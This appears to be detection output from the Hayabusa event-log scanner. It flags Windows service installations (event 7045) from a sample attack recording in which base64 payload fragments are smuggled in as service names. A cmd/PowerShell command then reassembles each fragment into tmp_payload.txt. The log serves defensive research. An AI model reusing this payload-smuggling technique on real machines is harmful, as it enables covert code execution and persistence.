2021-11-03 17:15:49.956 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgICMgUmVtb3RlIGJveA0KICAgICAgICBFbHNlIHsNCg0KICAgICAgICAgICAgaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg25"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:51.402 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: YgKCRPUyAtbGlrZSAiKlNlcnZlciAyMDAzKiIgLW9yICRPUyAtbGlrZSAiKldpbmRvd3MgWFAqIil7DQoNCiAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICIkT1MgaXMgYW4gb2xkIE9wZXJhdGlu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg26"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:51.402 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: YgKCRPUyAtbGlrZSAiKlNlcnZlciAyMDAzKiIgLW9yICRPUyAtbGlrZSAiKldpbmRvd3MgWFAqIil7DQoNCiAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICIkT1MgaXMgYW4gb2xkIE9wZXJhdGlu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg26"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:51.402 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: YgKCRPUyAtbGlrZSAiKlNlcnZlciAyMDAzKiIgLW9yICRPUyAtbGlrZSAiKldpbmRvd3MgWFAqIil7DQoNCiAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICIkT1MgaXMgYW4gb2xkIE9wZXJhdGlu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg26"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:52.852 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZyBTeXN0ZW0sIENvbGxlY3RpbmcgJExvZ05hbWUgRXZlbnQgTG9nIEluZm9ybWF0aW9uIHZpYSBXTUksIHRoaXMgbWF5IHRha2Ugc29tZSB0aW1lIg0KDQogICAgICAgICAgICAgICAgJHdtaV9ldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:52.852 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZyBTeXN0ZW0sIENvbGxlY3RpbmcgJExvZ05hbWUgRXZlbnQgTG9nIEluZm9ybWF0aW9uIHZpYSBXTUksIHRoaXMgbWF5IHRha2Ugc29tZSB0aW1lIg0KDQogICAgICAgICAgICAgICAgJHdtaV9ldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:52.852 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZyBTeXN0ZW0sIENvbGxlY3RpbmcgJExvZ05hbWUgRXZlbnQgTG9nIEluZm9ybWF0aW9uIHZpYSBXTUksIHRoaXMgbWF5IHRha2Ugc29tZSB0aW1lIg0KDQogICAgICAgICAgICAgICAgJHdtaV9ldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:54.314 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VudGxvZ3N1bW1hcnkgPSBHZXQtV21pT2JqZWN0IC1DbGFzcyBXaW4zMl9OVEV2ZW50TG9nRmlsZSAtY29tcHV0ZXJuYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xvYmFsOkNyZWQgLWZpbHRlciAi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg28"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:54.314 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: VudGxvZ3N1bW1hcnkgPSBHZXQtV21pT2JqZWN0IC1DbGFzcyBXaW4zMl9OVEV2ZW50TG9nRmlsZSAtY29tcHV0ZXJuYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xvYmFsOkNyZWQgLWZpbHRlciAi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg28"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:54.314 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VudGxvZ3N1bW1hcnkgPSBHZXQtV21pT2JqZWN0IC1DbGFzcyBXaW4zMl9OVEV2ZW50TG9nRmlsZSAtY29tcHV0ZXJuYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xvYmFsOkNyZWQgLWZpbHRlciAi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg28"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:55.766 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: TG9nRmlsZU5hbWUgPSAnJExvZ05hbWUnIg0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9ICR3bWlfZXZlbnRsb2dzdW1tYXJ5Lk51bWJlck9mUmVjb3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:55.766 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: TG9nRmlsZU5hbWUgPSAnJExvZ05hbWUnIg0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9ICR3bWlfZXZlbnRsb2dzdW1tYXJ5Lk51bWJlck9mUmVjb3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:55.766 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: TG9nRmlsZU5hbWUgPSAnJExvZ05hbWUnIg0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9ICR3bWlfZXZlbnRsb2dzdW1tYXJ5Lk51bWJlck9mUmVjb3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:57.209 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Jkcw0KDQogICAgICAgICAgICAgICAgJExvZ1NpemUgPSAoJHdtaV9ldmVudGxvZ3N1bW1hcnkuRmlsZVNpemUgLyAxTUIpDQogICAgIA0KICAgICAgICAgICAgICAgICR3bWlfZXZlbnRsb2dkYXRh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:57.209 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: Jkcw0KDQogICAgICAgICAgICAgICAgJExvZ1NpemUgPSAoJHdtaV9ldmVudGxvZ3N1bW1hcnkuRmlsZVNpemUgLyAxTUIpDQogICAgIA0KICAgICAgICAgICAgICAgICR3bWlfZXZlbnRsb2dkYXRh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:57.209 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Jkcw0KDQogICAgICAgICAgICAgICAgJExvZ1NpemUgPSAoJHdtaV9ldmVudGxvZ3N1bW1hcnkuRmlsZVNpemUgLyAxTUIpDQogICAgIA0KICAgICAgICAgICAgICAgICR3bWlfZXZlbnRsb2dkYXRh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:58.646 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ID0gR2V0LVdNSW9iamVjdCAtQ29tcHV0ZXJOYW1lICRjb21wdXRlciAtQ3JlZGVudGlhbCAkY3JlZCAtcXVlcnkgIlNlbGVjdCAqIGZyb20gV2luMzJfTlRMb2dFdmVudCBXaGVyZSBMb2dmaWxlID | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:58.646 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ID0gR2V0LVdNSW9iamVjdCAtQ29tcHV0ZXJOYW1lICRjb21wdXRlciAtQ3JlZGVudGlhbCAkY3JlZCAtcXVlcnkgIlNlbGVjdCAqIGZyb20gV2luMzJfTlRMb2dFdmVudCBXaGVyZSBMb2dmaWxlID | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:58.646 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ID0gR2V0LVdNSW9iamVjdCAtQ29tcHV0ZXJOYW1lICRjb21wdXRlciAtQ3JlZGVudGlhbCAkY3JlZCAtcXVlcnkgIlNlbGVjdCAqIGZyb20gV2luMzJfTlRMb2dFdmVudCBXaGVyZSBMb2dmaWxlID | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:00.100 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 0gJ2FwcGxpY2F0aW9uJyINCg0KICAgICAgICAgICAgICAgICRnZXR3bWlvbGRldmVudCA9ICAkd21pX2V2ZW50bG9nZGF0YXwgc2VsZWN0IC1sYXN0IDENCg0KICAgICAgICAgICAgICAgICRnZXR3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:00.100 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0gJ2FwcGxpY2F0aW9uJyINCg0KICAgICAgICAgICAgICAgICRnZXR3bWlvbGRldmVudCA9ICAkd21pX2V2ZW50bG9nZGF0YXwgc2VsZWN0IC1sYXN0IDENCg0KICAgICAgICAgICAgICAgICRnZXR3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:00.100 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0gJ2FwcGxpY2F0aW9uJyINCg0KICAgICAgICAgICAgICAgICRnZXR3bWlvbGRldmVudCA9ICAkd21pX2V2ZW50bG9nZGF0YXwgc2VsZWN0IC1sYXN0IDENCg0KICAgICAgICAgICAgICAgICRnZXR3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:01.552 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: bWluZXdlc3QgPSAkd21pX2V2ZW50bG9nZGF0YSB8IHNlbGVjdCAtZmlyc3QgMQ0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSBbbWFuYWdlbWVudC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:01.552 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bWluZXdlc3QgPSAkd21pX2V2ZW50bG9nZGF0YSB8IHNlbGVjdCAtZmlyc3QgMQ0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSBbbWFuYWdlbWVudC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:01.552 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bWluZXdlc3QgPSAkd21pX2V2ZW50bG9nZGF0YSB8IHNlbGVjdCAtZmlyc3QgMQ0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSBbbWFuYWdlbWVudC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:02.992 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 5tYW5hZ2VtZW50RGF0ZVRpbWVDb252ZXJ0ZXJdOjpUb0RhdGVUaW1lKCRnZXR3bWlvbGRldmVudC5UaW1lR2VuZXJhdGVkKSAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRU | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:02.992 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 5tYW5hZ2VtZW50RGF0ZVRpbWVDb252ZXJ0ZXJdOjpUb0RhdGVUaW1lKCRnZXR3bWlvbGRldmVudC5UaW1lR2VuZXJhdGVkKSAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRU | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:02.992 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 5tYW5hZ2VtZW50RGF0ZVRpbWVDb252ZXJ0ZXJdOjpUb0RhdGVUaW1lKCRnZXR3bWlvbGRldmVudC5UaW1lR2VuZXJhdGVkKSAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRU | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:04.456 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: aW1lID0gW21hbmFnZW1lbnQubWFuYWdlbWVudERhdGVUaW1lQ29udmVydGVyXTo6VG9EYXRlVGltZSgkZ2V0d21pbmV3ZXN0LlRpbWVHZW5lcmF0ZWQpDQoNCg0KICAgICAgICAgICAgICAgIH0NCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:04.456 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: aW1lID0gW21hbmFnZW1lbnQubWFuYWdlbWVudERhdGVUaW1lQ29udmVydGVyXTo6VG9EYXRlVGltZSgkZ2V0d21pbmV3ZXN0LlRpbWVHZW5lcmF0ZWQpDQoNCg0KICAgICAgICAgICAgICAgIH0NCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:04.456 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: aW1lID0gW21hbmFnZW1lbnQubWFuYWdlbWVudERhdGVUaW1lQ29udmVydGVyXTo6VG9EYXRlVGltZSgkZ2V0d21pbmV3ZXN0LlRpbWVHZW5lcmF0ZWQpDQoNCg0KICAgICAgICAgICAgICAgIH0NCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:05.897 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 0KICAgICAgICAgICAgZWxzZSB7DQoNCiAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9IChHZXQtV2luRXZlbnQgLUxpc3RMb2cgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg36"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:05.897 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KICAgICAgICAgICAgZWxzZSB7DQoNCiAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9IChHZXQtV2luRXZlbnQgLUxpc3RMb2cgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg36"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:05.897 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0KICAgICAgICAgICAgZWxzZSB7DQoNCiAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9IChHZXQtV2luRXZlbnQgLUxpc3RMb2cgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg36"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:07.351 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: bnRpYWwgJEdsb2JhbDpDcmVkKS5SZWNvcmRDb3VudA0KDQogICAgICAgICAgICAkTG9nU2l6ZSA9ICgoR2V0LVdpbkV2ZW50IC1MaXN0TG9nICRMb2dOYW1lIC1Db21wdXRlck5hbWUgJEFnZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg37"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:07.351 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bnRpYWwgJEdsb2JhbDpDcmVkKS5SZWNvcmRDb3VudA0KDQogICAgICAgICAgICAkTG9nU2l6ZSA9ICgoR2V0LVdpbkV2ZW50IC1MaXN0TG9nICRMb2dOYW1lIC1Db21wdXRlck5hbWUgJEFnZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg37"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
